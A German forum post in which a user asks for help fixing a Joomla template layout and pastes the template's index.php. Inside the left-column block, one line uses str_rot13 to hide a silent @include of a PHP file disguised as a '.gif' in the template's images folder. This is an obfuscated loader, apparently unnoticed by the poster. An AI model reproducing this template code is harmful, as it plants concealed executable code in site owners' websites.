Hi!
Ich kriegs nicht hin!
Wenn ich die index-php folgendermassen abändere paßt zwar die Modulposition,
aber Inhalt in der Mitte rutscht nach unten.
Code:
<body id="page_bg">
<div id="top">
<div class="pill_m">
<div id="pillmenu">
<jdoc:include type="modules" name="user3" />
</div>
</div>
</div>
<div id="header">
<div id="logo">
<a href="index.php"></a>
</div>
</div>
<div class="pill_o">
</div>
<!--<div id="search">
<jdoc:include type="modules" name="user4" />
</div>-->
<div class="clr"></div>
<div class="center">
<div id="wrapper">
<div id="content">
<div id="leftcolumn">
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<jdoc:include type="modules" name="left" style="rounded" />
</div>
<div id="rightcolumn">
<jdoc:include type="modules" name="right" style="rounded" />
</div>
<div id="maincolumn">
<div class="nopad">
<jdoc:include type="message" />
<?php if($this->params->get('showComponent')) : ?>
<jdoc:include type="component" />
<?php endif; ?>
</div>
<div class="clr"></div>
</div>
</div>
</div>
<jdoc:include type="modules" name="debug" />
</div>
<div id="footer">
<p><jdoc:include type="module" style="footer" />
<?php echo JText_('Powered by') ?> <a href="http://www.tim-liehmann.de">TL-Webdesign!</a>
<jdoc:include type="modules" name="debug" />
</p>
</div>
</body>
Vll hat ja jemand einen Tipp!
Gruß Tim
Lesezeichen